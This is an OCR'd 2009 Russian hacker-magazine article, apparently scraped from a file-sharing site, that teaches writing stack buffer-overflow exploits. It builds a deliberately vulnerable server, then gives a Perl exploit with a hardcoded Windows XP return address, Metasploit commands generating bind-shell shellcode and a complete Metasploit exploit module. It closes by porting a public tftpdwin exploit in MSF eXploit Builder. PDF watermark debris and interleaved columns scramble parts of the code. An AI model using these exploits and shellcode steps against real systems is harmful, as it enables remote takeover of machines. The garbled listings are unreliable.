Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

131_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

17.2 Mб

Скачать

☆

<<< < Предыдущая 1 2 34 / 154 5 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to
w Click										m
w									o
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

PC_ZONE

АНТОН «ANT» ЖУКОВ ANTITSTER@GMAIL.COM

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

030	XÀÊÅÐ 11 /131/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ФАБРИКА

СПЛОИТОВ

УЧИМСЯ ПИСАТЬ ЭКСПЛОИТЫ

ÄËß METASPLOIT FRAMEWORK

ОТКУДА БЕРУТСЯ СПЛОИТЫ? ЗАДУМЫВАЛСЯ ЛИ ТЫ, КАКИМ ОБРАЗОМ ТУСКЛАЯ НОВОСТЬ ИЗ БАГТРАКА ПРЕВРАЩАЕТСЯ В РЕАЛЬНО РАБОТАЮЩУЮ ОТМЫЧКУ? КАКИМ ОБРАЗОМ ДВУМЯ ДЕСЯТКАМ СТРОЧЕК КОДА УДАЕТСЯ ПОЛУЧИТЬ ШЕЛЛ НА УДАЛЕННОМ СЕРВЕРЕ? СЕГОДНЯ МЫ ПОСЕТИМ ФАБРИКУ СПЛОИТОВ И ВО ВСЕХ ПОДРОБНОСТЯХ ПОСМОТРИМ, КАК ИЗГОТАВЛИВАЕТСЯ КАЧЕСТВЕННОЕ ИЗДЕЛИЕ.

Сплоит — что же это за зверь такой дико-

винный? По сути, это программа, написанная с целью использования уязвимости — в ОС, обычной программе или веб-приложении.

Он может представлять из себя что угодно — программку на С/С++ (Delphi, Asm), скриптик на Perl или PHP, или даже находиться внутри картинки, но главное, что он влияет на уязвимую систему и заставляет ее работать так, как она не запрограммирована. Удаленный эксплоит работает через сеть и использует

уязвимость без какого-либо предварительного доступа к уязвимой системе. Локальные же сплоиты запускаются непосредственно в уязвимой системе, требуя предварительного доступа к ней и обычно используются для повышения привилегий.

Сплоиты можно разделить по типу используемой уязвимости: переполнение буфера, SQL-инъекция, межсайтовый скриптинг и т.д. Короче говоря, разновидностей бывает много и каждая из них отличается как техникой

исполнения, так и своей целью. Но есть в них одно общее — все они содержат код, выполняющий задуманные хакером действия. Этот код называют: байт-код, шелл-код (так как очень часто он предоставляет доступ к шеллу на удаленной системе), полезной (боевой) нагрузкой (payload). Написание такого кода — целое искусство. Если хочешь разобраться в этой области, советую начать со статьи Step'а «Откуда берутся шелл-коды» (PDF прилагается на диске). Мы же рассмотрим процесс

XÀÊÅÐ 11 /131/ 09

031

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

PC_ZONE

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

МОДИФИЦИРОВАННЫЙСПЛОИТСПОЛУЧЕННОЙРАНЕЕ СТРОКОЙ(ОБРАЩАЕМВНИМАНИЕНАEIP)

INFO

info

• Подробнаяинфор-

мацияобMetasploit API: www.metasploit. com/documents/api/ msfcore/index.html.

•БлогMetasploit Framework: blog.metasploit.com.

•Статьяподоработке эксплоита: en.wikibooks.org/ wiki/Metasploit/ WritingWindowsExploit.

•Видео, показывающее, каксоздать

Portable-версию Metasploit дляразме-

щениянафлешке: www.wonderhowto. com/how-to/video/ how-to-create- a-metasploit- meterpreter- executable-file-263017.

•Старые(исоответственноуязвимые) версиипрограмм всегдаможнонайти наoldapps.com

иoldversion.com.

написания эксплоита, а шелл-код возьмем уже готовый из пакета Metasploit.

ПИШЕМ ЖЕРТВУ ДЛЯ ЭКСПЕРИМЕНТОВ

Убежден, что нет более наглядного способа продемонстрировать создание боевого кода, чем на конкретном примере. Поэтому начнем с игры в горе-программистов и наваяем небольшое серверное приложение, оставив в нем критическую уязвимость, которую и будем эксплуатировать. Приложение будет принимать подключения на определенном порту: как только придет некоторый пакет, будет вызываться функция, выполняющая некоторые действия с полученными данными, после чего приложение завершается. Скелет приложения приведен ниже, а полный исходник ты найдешь на диске:

void pr( char *str)

{

char buf[500]="";

strcpy(buf,str); // вот и сама уязвимость, собственной персоной

}

int main(int argc,char **argv) {

... int bytesRecv = SOCKET_ERROR;

while( bytesRecv == SOCKET_ERROR )

{

//Получаем данные, отправленные клиентом bytesRecv = recv( clientSocket,

Message, 5000, 0 );

if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )

{

printf( "\nConnection Closed.\n"); break;

}

СТЕКДОВЫЗОВАSRTCPY (ВЫДЕЛЕНЫ [EBP][RET][СЛЕДУЮЩИЙКАДРСТЕКА])

СТЕКПОСЛЕВЫЗОВАSTRCPY (ВЫДЕЛЕНЫ [EBP][RET][СЛЕДУЮЩИЙКАДРСТЕКА])

pr(Message); // вызываем функцию, которая не проверяет длину входного буфера при копировании

closesocket(clientSocket); closesocket(serverSocket); WSACleanup();

return 0; }

Внимательно взглянув на код, можно увидеть, что функция void pr(char *str) не проверяет длину входного буфера и, если передать ей в качестве параметра строку длиной более 500 символов — получится классическое переполнение буфера. Совсем кратко о том, какэто работает (тут придется вспомнить, как работает стек):

PUSH EDI // кладем в стек указатель на буфер, который будем копировать (*str) CALL Server._pr // вызываем функцию pf

После вызова CALL стек будет выглядеть следующим образом:

...

buf — локальная переменная, куда будем копировать входящие данные

ebp — сохраненный указатель кадра стека ret — адрес возврата

*str — указатель на входящий буфер

...

Под переменную buf у нас выделено 500 байт. А что будет, если скопировать туда строку длиннее?

[buf][EBP][ret][*str]

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]

Как видишь, такая строка затрет EBP, адрес возврата и все, что расположено ниже по стеку. Т.е. можно перезаписать адрес возврата нужным нам значением и тогда при выходе из функции мы можем вернуться, куда захотим, например, на наш шелл-код.

Тут, правда, стоит сделать поправку — уязвимости может и не быть. В смысле, от такой критической ошибки, конечно, никуда не деться, и программа в любом случае будет падать, однако использовать переполнение в сплоите может не получиться. Виной тому — стековые

032	XÀÊÅÐ 11 /131/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ГЕНЕРИРУЕМСТРОКУ, ЧТОБЫ ОПРЕДЕЛИТЬ, КАКИЕСИМВОЛЫ ЗАТЕРАЮТАДРЕСВОЗВРАТА

		СТРУКТУРАMETASPLOIT
		FRAMEWORK
		1000 ($junk = "\x41" x1000). Чтобы наглядно
		посмотреть, что в момент получения такой
		строки происходит внутри нашего сервера,
		запускаем его под отладчиком — идеально,
		под OllyDbg (www.ollydbg.de). Выбираем
		наш бинарник через меню «File Æ Open» и
		отдаем команду на выполнение: «Debug Æ
		Restart Æ Run». Далее запускаем простень-
		кий сплоит, который, как и следовало ожи-
		дать, убивает наш сервер наповал. Смотрим
		в отладчик — адрес возврата из функции pf
СГЕНЕРИРОВАННЫЙMETASPLOIT БОЕВОЙШЕЛЛКОД		(и, как следствие, регистр EIP, указываю-
		щий на следующую инструкцию) оказыва-
куки — специальная защита, включаемая	my $host = shift \|\| 'localhost';	ется перезаписанным значением 41414141
в бинарник компилятором во время сборки	my $port = shift \|\| 200;	(как ты помнишь, 0х41 — это символ А).
приложения. Существует несколько спосо-	my $proto = getprotobyname('tcp');	Но на момент, когда мы будем глядеть в
бов обхода такой защиты (подробнее — во		отладчик, уже произойдет возврат по адресу
врезке), но сейчас для простоты примера	# осуществляем привязки	41414141, и мы будем видеть только EIP. Для
представим, что стековые кукисы отключены.	my $iaddr = inet_aton($host);	успешной эксплуатации уязвимости нужно
Поэтому либо отключаем поддержку кукисов	my $paddr = sockaddr_in($port,	построить ядовитую строку так, чтобы она
во время компиляции в Visual Studio, либо	$iaddr);	переписывала адрес возврата нужным нам
используем компилятор, который вообще не		значением — адресом нашего шелл-кода.
умеет встраивать подобную защиту. Второй	print "[+] Setting up socket\n";	Поэтому сначала необходимо выяснить,
вариант, как мне кажется, проще — потому	# создаем сокет и присоединяемся	какие именно символы строки затирают
как можно использовать бесплатный ком-	к порту	адрес возврата. В этом поможет одна из
пилятор lccwin32 (www.cs.virginia.edu/~lcc-	socket(SOCKET, PF_INET,	утилит Metasploit Framework. Но перед этим
win32). Итак, компилируем и запускаем.	SOCK_STREAM, $proto)	предлагаю тебе быстренько ознакомиться с
УБИТЬ НАПОВАЛ!	or die "socket: $!";	фреймворком.
УБИТЬ НАПОВАЛ!	print "[+] Connecting to $host on	ИСПОЛЬЗУЕМ METASPLOIT
Сервер работает ровно до тех пор, пока	port $port\n";	ИСПОЛЬЗУЕМ METASPLOIT
ему не придет строка, состоящая более чем	connect(SOCKET, $paddr) or die	ДЛЯ РАЗРАБОТКИ ЭКСПЛОИТА
из 500 символов. В противном случае —	"connect: $!";	Символов в передаваемой строке 1000,
непременно вылет приложения. Набросаем	print "[+] Sending payload\n";	все они одинаковые, поэтому неудиви-
небольшой скриптик на Perl'е для эксплуата-	print SOCKET $junk."\n";	тельно, что в строке возврата появляется
ции переполнения буфера:	print "[+] Payload sent\n";	значение, состоящее из буквы A. Но если
		составить строку, которая будет состоять
use strict;	close SOCKET or die "close: $!";	из неповторяющихся буквенно-числовых
use Socket;		строк, то легко определить позицию тех
use Socket;		строк, то легко определить позицию тех
my $junk = "\x41" x1000;	Скрипт просто соединяется с сервером и	символов, которые попадают в адрес воз-
# адрес и порт узявимого демона	посылает ему строку символов «А» длиной	врата. Генерацией такой строки как раз

XÀÊÅÐ 11 /131/ 09

033

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

PC_ZONE

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ИСПОЛЬЗУЕМНАПИСАННЫЙMETASPLOIT МОДУЛЬДЛЯЭКСПЛУАТАЦИИУЯЗВИМОГОСЕРВЕРА

WARNING

warning

Информацияпредставленаисключительновознакомительныхцелях, чтобы показать, чегостоят критическиеуязвимостивкодеикак злоумышленники могутихиспользовать. Неповторяйэти действиявпротивозаконныхцелях.

Впротивномслучае авториредакция ответственностине несут!

DVD

dvd

Всеисходникиипрограммы, упомянутые встатьеты, как обычно, найдешьна диске.

и занимается утилита, входящая в состав Metasploit, pattern_gererate. В качестве единственного обязательного параметра передается длина строки. Итак, создадим буфер длиной в 1000 символов для даль- нейшего использования в нашем сплоите:

msf > ruby pattern_create.rb 1000 Aa0Aa1Aa2Aa3 [967 символов вырезано злым редактором] Bh0Bh1Bh2Bh

А в скрипте заменим значение переменной $junk на вышеприведенную последовательность. Заново запускаем наш уязвимый сервер, подключаемся к нему в OllyDbg и запускаем эксплоит. Сервер опять падает. Что ж, давай взглянем, что на этот раз оказалось в регистре EIP? EIP = 41387141. Чтобы определить смещение символов в строке, используем другую утилиту из набора Metasploit — pattern_offset, пере-

давая в параметрах искомую величину и длину буфера:

my $totalbuffer = 1000;

# длина буфера

my $junk = "\x41" x 504;

# первые 504 символа "А"

my $eipoverwrite = "\x42" x 4;

#4 символа "В", которые перезапишут адрес возврата

my $junk2 = "\x43" x ($totalbufferlength($junk.$eipoverwrite));

#оставшееся место в буфере заполняем символами "С"

Изаменяем строчку кода, отправляющую сформированную строку в сокет, на:

print SOCKET $junk.$eipoverwrite.$junk2."\ n";

Чтобы проверить, запускаем эксплоит и смотрим в отладчик. Ага, так и есть: EIP = 42424242. Увы, тысячи символовслишком мало, чтобы уместить шелл-код, поэтому

попробуем увеличить длину ядовитой строки и посмотреть, как будетработать сплоит. Длину выбираем экспериментально: методом проб и ошибок. После увеличения длины с 1000 до 2000 (my $totalbuffer = 2000) убеждаемся,

что сплоит по-прежнему работает так же успешно. А это значит, мы имеем 2000-4-504=1492 байта для размещения нашего шелл-кода. Все это прекрасно, но как передать управление шелл-коду — ведь его адреса мы не знаем! Давай посмотрим, что у нас происходит со стеком в момент переполнения. Поставим в отладчике бряк на функцию

strcpy. bpx strcpy не работает — значит, поставим бряк вручную. Как видно из исходников, вызов strcpy проис-

ходит в функции pf, которая вызывается непосредственно после цикла while() в main. В цикле у нас происходит вызов recv: попробуем поставить бряк на него с помощью команды bpx recv. Ага, сработало! Теперь смотрим чуть ниже цикла и видим вызов call server._pf. Становимся на этой инструкции, нажимаем <Enter> и попадаем в функцию pf. В ней есть всего один call — вызов strcpy. Он-то нам и нужен: переходим на него и нажимаем <F2> для установки брэйкпоинта.

0040130B: CALL 00404351

Далее запускаем эксплоит. Бряк сработал, — смотрим, что в стеке (в olly стек показывается в правом нижнем углу и имеет формат «адрес — значение — коммена-

рий; типа return to kernel32.728232»):

[buf][ebp][ret][предыдущий стековый фрейм]

Нажимаем <F8> (перейти на следующую инструкцию) и отмечаем изменения в стеке:

034	XÀÊÅÐ 11 /131/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ПОЛУЧИВШИЙСЯMETASPLOIT ЭКСПЛОИТ

[buf][ebp][ret][пред. стековый фрейм]

[AAAAAAAA][BBB][CCCCCCCC…]

Теперь взглянем на конец функции pf:

00401313	POP	EDI
00401314	POP	ESI
00401315	LEAVE
00401316	RETN

При вызове команды LEAVE происходит следующее:

MOV	ESP, EBP //теперь в ESP
содержится адрес [ebp]
POP	EBP // в EBP заносится зна-

чение из [ebp] (эта область у нас перезаписана символами «А», следовательно, EBP будет равен

41414141), ESP теперь указывает на адрес возврата.

При выполнении команды RETN из стека выталкивается адрес возврата — поэтому получается, что ESP указывает на начало стекового фрейма, то есть на $junk2, где мы и будем размещать наш шелл-код. А как перейти по адресу, лежащему в esp? Хороший вопрос! Переход к ESP — вполне обычное действие для виндовых приложений. Более того, любое такое приложение использует, как минимум, одну системную DLL’ку, в которых есть инструкции на любой вкус. Адреса в таких DLL'ках, как правило, статичны и не изменяются! Получается, если найти инструкцию перехода

на ESP (а это либо jmp esp, либо push esp + ret, либо call esp), взять ее адрес и заменить им адрес возврата, то на выходе из функции управление передастся на ESP — прямиком нашему шелл-коду.

Есть один момент, который стоит упомянуть! Адрес возврата не должен содержать нулевых байтов, ведь функция strcpy воспримет все как признак конца строки и не скопирует оставшуюся часть буфера, то есть $junk2, куда мы хотели разместить шелл-код. Поэтому мы будем искать инструкцию перехода по esp в динамических библиотеках, используемых приложением, так как адрес такой инструкции в библиотеках будет выше, и не будет занимать все четыре байта — исключая возможность появления нуля в начале.

Осуществлять поиск будем с помощью полезной утилиты findjmp, входящей в состав пакета тулз MSF eXploit Builder (www.securinfos.info/ metasploit/MSF_XB.php) — он нам понадо-

бится и позже. Прога ищет адрес команды call, jmp, push + регистр и ret в dll или приложении. Наша программа работает с сокетами, и значит, она будет использовать стандартную виндовую библиотеку ws2_32.dll. Посмотрим, есть ли там интересующий нас опкод (то есть машинные инструкции, соответствующие передаче управления на ESP). Запускаем с указанием, во-первых, библиотеки для поиска, и, во-вторых, нужного регистра:

Findjmp2.exe ws2_32.dll esp Scanning ws2_32.dll for code useable with the esp register 0x71AB9372 push esp — ret

Finished Scanning ws2_32.dll for code useable with the esp register Found 1 usable addresses

Найден один подходящий нам адрес — 0x71AB9372. Кстати, если вдруг нужного опкода

вдругой ситуации не найдется — не беда, можно поискать в kernel32.dll, которая используется всеми приложениями. Аналогичный поиск по этой библиотеке дает еще два подходящих адреса. В действительности, это не самый удачный вариант и искать опкоды в системных библиотеках стоит в самом последнем случае. Дело в том, что библиотеки различаются от системе к системе и даже от версии сервиспака, установленного в винде. Адрес 0x71AB9372 действителен только для английской Windows XP SP2 — для другой системы он будет другой! Именно поэтому подходящие опкоды стоит искать в DLL'ках, которые устанавливает в систему сама программа — только

вэтом случае есть шанс написать независящий от версии Widnows сплоит. В нашем случае, увы, такой вариант невозможен в виду простоты примера, но свои динамические библиотеки для реального виндового приложения — это в большинстве случаев норма. Осталось только создать шелл-код. Как я уже говорил, к сплоиту предъявляется одно важное требование — он не должен содержать нулевых байтов. В программе копируется строка, и если встретится «0», он будет воспринят как конец строки. Соответственно, оставшаяся часть строки не скопируется, а неполный шелл-код, естественно, не будет работать. В создании шелл-кода нам опять поможет Metasploit и консольный интерфейс для управления фреймворком. Итак, запускаем консоль tools/msfconsole и вводим следующее:

msf > use windows/shell_bind_tcp // будем использовать этот payload msf payload(shell_bind_tcp) > set LPORT 5555 // устанавливаем значе- ние порта на удаленной машине LPORT => 5555

С помощью команды «generate -h» посмотрим опции, которые можно указать для генерации шелл-кода:

•-b <opt> — список символов, которые следует исключить из шелл-кода;

•-f <opt> — имя файла, куда сохраняется шелл-код;

•-t <opt> — тип шелл-кода: ruby, perl, c или raw.

Указываем, что надо избегать байтов '\x00\xff', генерировать код для Perl'a и сохранить полу-

ченные результаты в c:\\shellcode.bin:

msf payload(shell_bind_tcp) > generate -b '\x00\xff' -f c:\\ shellcode.bin -t perl

[*] Writing 1747 bytes to c:\ shellcode.bin...

XÀÊÅÐ 11 /131/ 09

035

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

PC_ZONE

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ность — с помощью методов. Создаваемый объект наследуется от одного из предопределенных классов. Поскольку мы создаем удаленный сплоит, то и наследуем наш объект от родительского класса «Удаленный эксплоит». В синтаксисе Ruby это делается так:

		class Metasploit3 <
		Msf::Exploit::Remote.

		Большая заслуга Metasploit в том, что он уни-
		фицирует большое количество параметров
		и действий, позволяя использовать готовые
		конструкции вновь и вновь. Первый элемент
		разрабатываемого класса — секция include,
		где мы подключаем обработчик для нужного
		нам протокола. В Metasploit есть обработчики
		для http, ftp и других протоколов, что позволяет
		быстрее писать эксплоиты, не заморачиваясь
		с их собственной реализацией. Наш эксплоит
КОНСТРУИРУЕМСМЕРТОНОСНЫЙПАКЕТ		использует TCP-подключение, поэтому код
		будет выглядеть следующим образом:
Вот теперь, имея на руках шелл-код, наста-	(Windows XP SP3), можно увидеть, что значе-
Вот теперь, имея на руках шелл-код, наста-	(Windows XP SP3), можно увидеть, что значе-	include Msf::Exploit::Remote::Tcp
ло время собрать полноценный эксплоит.	ние смещения не меняется — меняется только
ло время собрать полноценный эксплоит.	ние смещения не меняется — меняется только
Единственное — нужно помнить несколько	наш адрес возврата.	Далее весь сплоит делится на два метода:
моментов:	ЭКСПЛОИТ ДЛЯ METASPLOIT	метод инициализации, в котором мы указыва-
• в шелл-коде не должны встречаться 0xff и	ЭКСПЛОИТ ДЛЯ METASPLOIT	ем информацию, необходимую для успешного
0x00 байты, но мы об этом уже позаботились;	Итак, у нас есть сплоит для конкретной плат-	выполнения эксплоита, и метод эксплуатации,
• непосредственно перед шелл-кодом нужно	формы с вполне определенной нагрузкой,	в котором мы отправляем на сервер ядовитую
поместить цепочки из NOP (машинная коман-	открывающей в системе шелл. Так зачем	строку.
да — нет операции) — на случай, если мы чуть-	нужна вообще какая-либо специальная	Начнем с инициализации. Параметр Payload
чуть накосячили с адресом возврата.	платформа для создания сплоита, если мы	задает длину ядовитого буфера и недопусти-
Отправляемая серверу строка будем формиро-	вполне обошлись силами одного лишь Perl'а?	мые символы (в нашем случае — 0х00 и 0xff):
ваться следующим образом:	Причина в том, что Metasploit предоставляет
	огромное количество заготовок, реализаций	'Payload' =>
my $junk = "\x90" x 504; // первые	различных протоколов, одну из самых больших	{
504 NOP’a	баз шелл-кодов, payload-ов, которые можно	'Space'	=> 1400,
#jmp esp (from ws2_32.dll)	использовать при написании собственного	'BadChars' => "\x00\xff",
my $eipoverwrite =	эксплоита. Вместо убогого скрипта на Perl'е	}
pack('V',0x71AB9372); // переза-	можно написать модуль для Metasploit, после
pack('V',0x71AB9372); // переза-	можно написать модуль для Metasploit, после
писываем адрес возврата значением	чего запускать его на любой платформе и	Далее определяем цели эксплоита и специ-
0x71AB9372	выбирать payload на свой вкус! Чуешь разни-	фичные для каждой цели параметры, такие как
#add some NOP's	цу? Предлагаю прямо сейчас усовершенство-	адрес возврата, смещение и т.д.:
#add some NOP's	цу? Предлагаю прямо сейчас усовершенство-	адрес возврата, смещение и т.д.:
my $shellcode="\x90" x 50; // добав-	вать наш сплоит, переписав его для Metasploit,
ляем 50 nop-ов перед шелл-кодом	и посмотреть, как это работает. Само собой, он	'Platform'	=> 'win',
// прибавляем сгенерированный нами	будет обладать возможностью выбора плат-	'Targets'	=>
øåëë-êîä (windows/shell_bind_tcp)	формы для атаки, а выбирать пейлоад ты смо-	[
øåëë-êîä (windows/shell_bind_tcp)	формы для атаки, а выбирать пейлоад ты смо-	[
$shellcode=$shellcode."\xbb\x2e\ [è	жешь прямо во время ее исполнения.	['Windows XP SP2 En',
тут тоже кушал редактор ] xd3";	Любой эксплоит для Metasploit имеет фикси-	{ 'Ret' => 0x0x71ab9372,
	рованную структуру, которая состоит из объ-	'Offset' => 504 } ],
	рованную структуру, которая состоит из объ-	'Offset' => 504 } ],
Окончательная строка, отправляемая в сокет:	явления заголовочных файлов, подключения	['Windows 2003 Server R2 SP2',
	ядра msf/core, определения класса эксплоита,	{ 'Ret' => 0x71c02b67,
// и отправляем ядовитую строку	в котором описывается его функциональность.	'Offset' => 504 } ],
серверу	Я не буду приводить здесь полный исходник	...
print SOCKET $junk.$eipoverwrite.$s	модуля, но выкладываю на диске. Рекомендую	]
hellcode."\n";	для большей ясности открыть его прямо сей-
hellcode."\n";	для большей ясности открыть его прямо сей-
	час и далее читать мое практически построч-	Обрати внимание, мы не определяем сам
	час и далее читать мое практически построч-	Обрати внимание, мы не определяем сам
После чего пытаемся в сплоите установить	ное объяснение кода.	шелл-код — то есть, нагрузку, которую выпол-
соединение с удаленной машиной на 5555	Первое, с чего начинается любой сплоит, —	нит сплоит. Действие на удаленной машине
порту, который мы указали при генерации	это подключение ядра Metasploit Framework:	будет выбираться интерактивно во время
шелл-кода:		работы в консоли Metasploit'ом. Сейчас нам
	require 'msf/core'	остается только написать самое главное
system("telnet $host 5555");		— метод для эксплуатации уязвимости. С
system("telnet $host 5555");		— метод для эксплуатации уязвимости. С
	Функциональность любого сплоита описыва-	помощью команды connect устанавливаем
	Функциональность любого сплоита описыва-	помощью команды connect устанавливаем
Запускаем эксплоит и… о чудо, он работает!	ется с помощью класса, где настройки зада-	TCP-соединение (обработчик протокола
Протестировав эксплоит на различных ОС	ются с помощью параметров, а функциональ-	мы подключили выше и даже указали порт,

036	XÀÊÅÐ 11 /131/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

КОНСТРУКЦИЯСПЛОИТАВMSF EXPLOIT BUILDER

помнишь?), далее — определяем ядовитую строку и передаем ее в сокет, после чего разрываем соединение. Ядовитый буфер состоит из цепочки NOP-команд, величины Offset

— затем к ней прибавляется адрес возврата, еще небольшая NOP-цепочка и зашифрованный PAYLOAD. Все вместе выглядит так:

def exploit connect

junk = make_nops(target['Offset']) sploit = junk + [target.ret].

pack('V') + make_nops(50) + payload.encoded

sock.put(sploit)

handler disconnect

end

Вот и все, наш первый модуль для Metasploit готов! Чтобы его можно было использовать, скопируем исходник в папку modules/exploits/ test (если не нравится test — можешь скопировать в windows/misc, например). Запускаем msfconsole и работаем в интерактивной консо-

ли Metasploit'а!

ЭКСЛОИТ ЗА 5 МИНУТ

Как видишь, разработать эксплоит для Metasplot не так сложно. Скорее даже наоборот, ведь большая часть работы уже сделана за тебя. Взять хотя бы огромную базу шелл-кодов

— попробуй разработать свой. Но лени человеческой нет предела, поэтому в стремлении еще больше упростить процесс был разработан пакет утилит MSF eXploit Builder. Программа имеет удобный графический интерфейс и поможет по-настоящему быстро создавать

новый модуль для Metasploit. Кроме удобного GUI, eXploit Builder включает в себя целую кучу полезных тулз, необходимых для отладки и тестирования эксплоитов. Более того — можно опять же не создавать с нуля, а портировать уже существующие сплоиты.

Предлагаю взять какой-нибудь эксплоит и с помощью MSF eXploit Builder превратить его в Metasploit-модуль. Ты спросишь, зачем это нам надо? Превратив его в Metasploit-модуль, мы можем использовать его вместе с различными payload-ами. Проще говоря, это сделает эксплоит более универсальным и кроссплатформенным. Сейчас ты сам убедишься, насколько эта программа может упростить жизнь — ведь теперь для написания и отладки эксплоита не нужно даже знание Ruby и Metasploit API. В

качестве кролика для эксперимента я выбрал первое, что попалось, — сплоит для tftpdwin 0.42 (milw0rm.com/exploits/7452).

Запускаем MSF eXploit Builder, заходим в меню «Editor» и выбираем «New». Появляется окно с несколькими вкладками (Information, Badchars, Analysis, Shellcode, Design). Переходим на вклад-

ку «Information» и видим много интересных полей. Как ты помнишь, в этой секции указываются цели (OS + SP) и тип/протокол эксплоита (например, remote/tcp). Более того, программа предоставляет нам возможность тестирования и отладки полученного эксплоита, поэтому тут же можно выбрать исполняемый файл и указать параметры для его запуска (порт, ip-адрес). Итак, выбираем наш tftpd.exe, после чего утилита предложит следующие действия на выбор: запустить приложение, запустить его под отладчиком или не запускать вообще

— просто запустим приложение. Обрати внимание, что справа сбоку отобразится список загруженных приложением DDL'ек.

Теперь начинаем смотреть код сплоита — на наше счастье он предельно понятный.

XÀÊÅÐ 11 /131/ 09

Комментарий «Restricted chars = 0x00 0x6e 0x65 0x74» явно указывает на запрещенные символы — что ж, выставим их в нашей программе. Для этого переходим на вкладку Badchars и в одноименном поле вводим: \x00\ x6e\x65\x74. Далее по коду мы видим, как формируется ядовитый пакет:

my $packet = (($p1).($nopsled). ($shellcode).(($overflow)).($ret). ($p2));

Разбираемся с каждой составляющей и заодно составляем буфер для отправки во вклад-

ке «Design». Сначала идет переменная $p1 (my $p1=«\x00\x01»;). Вводим их в поле Value (Operation по умолчанию оставляем RAW). За ней идет переменная $nopsled (my $nopsled

=«\x90» x 10;) — выбираем Operation = NOP

и устанавливаем длину в 10. Далее распола-

гается $shellcode — устанавливаем Operation

=PAYLOAD и Length = 0. Следующая часть — $overflow (my $overflow = “\x41” x $len; строка из символов «А» длиной в $len). Переменная my $len = (274 — length($shellcode)), то есть строка длиной 274 символа минус длина шелл-

кода. Выставляем Operation = RAW, Length = 274 и выбираем (нажимаем поочередно) вверху кнопки RAW could be: rand_text_alpha, -payload. encoded.length, что означает: длина строки будет высчитываться по вышеприведенной формуле. Потом добавляем адрес возврата $ret (my $ret

=“\x5d\x10\x40”) и выбираем Operation = RET.

Наконец, добавляем $p2, равное «\x00\x6e\ x65\x74\x61\x73\x63\x69\x69\x00», и выбираем

